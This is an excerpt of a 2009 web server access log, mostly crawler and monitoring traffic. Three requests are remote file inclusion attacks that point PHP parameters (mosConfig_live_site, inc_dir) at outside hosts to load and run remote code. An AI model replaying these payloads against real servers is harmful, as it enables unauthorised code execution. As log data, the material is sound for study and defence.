220.231.126.252 - - [04/Sep/2009:03:54:25 -0400] "GET /logs/access_log.Q109070700%20%20//admin.color.php?mosConfig_live_site=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
220.231.126.252 - - [04/Sep/2009:03:54:44 -0400] "GET /logs/access_log.Q109051500%20%20//admin.color.php?mosConfig_live_site=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/fxid.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:03:56:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.87 - - [04/Sep/2009:03:57:41 -0400] "GET /logs/error_log.Q109083000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.201 - - [04/Sep/2009:03:58:34 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01 HTTP/1.1" 200 49495 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.105.232 - - [04/Sep/2009:03:58:55 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.71.201 - - [04/Sep/2009:03:59:03 -0400] "GET /images/over-index16_digicam.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
65.55.105.232 - - [04/Sep/2009:03:58:55 -0400] "GET /logs/error_log.Q109070700 HTTP/1.1" 200 2847307 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
78.47.128.166 - - [04/Sep/2009:03:59:26 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06new/readme.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
